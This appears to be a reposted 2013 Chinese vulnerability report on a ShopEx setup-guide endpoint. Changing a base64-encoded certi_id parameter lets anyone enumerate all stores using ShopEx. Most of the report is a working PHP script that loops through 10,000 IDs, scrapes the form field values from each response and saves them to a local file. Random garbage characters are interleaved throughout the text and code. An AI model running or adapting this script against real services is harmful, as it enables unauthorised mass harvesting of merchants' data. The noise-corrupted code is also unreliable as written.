|
|
简要描述:& R% G& p) ]" N1 r" w
ShopEx某接口缺陷,可遍历所有网站$ N: n H- ?% I( \: q. X
详细说明:
: _) t: d3 y% C- j& A" P问题出现在shopex 网店使用向导页面 + H' I- T5 |. F5 s' i. l3 `
A d7 S% d f: W( z* c. W1 M4 w/ F4 n: t3 @
# [; F1 _( p9 T% s* shttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=2 ~, q( v9 O+ ]4 F. ]& j
' B% X) S, v# N' l( M
& f' U/ B7 u* l6 X% E9 u3 ~" K' `! Y6 M4 a: O
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
" A! U) j/ s8 s
9 D: G$ D# C7 Z/ u+ s4 M( {& }- ^! q6 C# G
8 J- i+ Q$ x. Y6 e, q我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
* }( W7 p5 x0 s( \+ h' w% l8 L9 o% l- G. k- B" ^) i- A
- X/ V/ e9 W& ?# Z
0 f* I- E( p/ X<?php
. V: L$ i9 b5 N" J* ]& d5 ?* v+ T# Y* h* W" [) I5 p
for ($i=1; $i < 10000; $i++) { //遍历
2 p8 u2 D5 o' v) y1 h
2 K' M7 v- v* ~. l( v1 v ShowshopExD($i);
* C2 o' c; _* ?/ v: w$ i5 T/ Z( L1 Q2 X/ O) F8 J
}
0 t* V' o4 T' D# ]0 J
6 V [0 I+ P) Z& O+ [ function ShowshopExD($cid) {
, o. q8 }' ?0 U
2 k& d2 }+ i: B* ?7 s# ? $url='http://guide.ecos.shopex.cn/step2.php';
* e8 X9 A* C# F; x2 S5 \6 z% o+ `& J1 P* b% @
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
/ e4 P% W3 }9 t: ^2 E% \
. S V0 @7 d( X' q& R2 M J $url = $url.'?refer='.$refer;
" c. U4 f$ [* K# ]& d! e2 O: i0 v4 r7 R7 q2 r! v
$ch = curl_init($url);$ _+ M& Z; U- [
+ q3 z8 J9 n, @1 g7 g1 l7 p curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;" m4 G0 W8 y! `3 u3 e
, f; I8 P; l R* m( n
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;, M7 e5 d, T: p4 v5 Y; Q( Q
+ _1 D1 y: W% l6 Q- g3 w2 X) j
$result = curl_exec($ch);
4 [+ G% @" s" q* O4 a7 f) V y! i9 ^$ G% g
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
* b' {- o2 h8 C8 ?' @
6 I. s, m: R7 t; |1 R* ~ if(strpos($result,$refer))
5 @6 Z+ ]% m/ X$ H ^
/ ^$ P$ D# W' n {1 {4 h& m. P( ]* K- I! z8 R
: c6 _" Q7 |/ x4 L- W! s _+ {
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
2 z6 U9 J) r7 Y9 o! C
' t( N0 Y- S: q8 @3 @ preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);, X9 { x2 X' @1 V( e
/ V+ Y. { R+ K6 u( C- y foreach ($value[1] as $key) {
; ]4 |+ m: }6 b' v; b
) N3 w" s& i( B9 r( C! T. e preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
1 V5 W7 j/ u0 p/ m& h# n* d5 M' ?. h, Z4 L- u2 S
echo $res[1][0].':'.$res[3][0]."\r\n";
" `- h6 R5 @0 Y: F1 g; J( W1 T2 q0 G1 Q. ~( _$ B
$col =$res[1][0].':'.$res[3][0]."\r\n";
% Y4 ]. }- G* r7 ~
0 C' Z+ P* i" `' p+ z fwrite($fp, $col, strlen($col));
6 }: U! t* x5 l, x
% i' ~& T( a; O! K" O4 f6 D2 k; r }9 A) I( P% B: T( z
- E" ]/ g! z1 q: c! M! @& d
echo '--------------------------------'."\r\n";
8 Q9 b F' O# O) x3 p2 e
# ]$ b: N9 y( D+ ? fclose($fp); - ]; G9 e& p4 C: a, h" Y- k- V! X
$ R1 r7 x! E& Z- `& U! l) H }
! L& y7 j* k/ i# w: E3 L) V* X- n# g- b1 d( f! \3 s! a# N: V
flush();
, |( r+ V9 g5 q7 ~/ }1 k' }8 P
- \( J1 B( a$ Y' N' {. X% t curl_close($ch);
4 W7 I% R+ N& I1 N
1 W" L9 l' K0 F4 C }) [. j/ ]+ M2 l. f! b& O" Q
0 A6 y# M* _9 Q/ M4 E( j" S: h
?>
$ [+ C, Y6 S$ ~漏洞证明:, P' S- q* n2 {: h5 V, x
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
3 N |1 ]% e# Q+ e6 Trefer换成其他加密方式
7 q% P- I) L6 M- F9 F |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对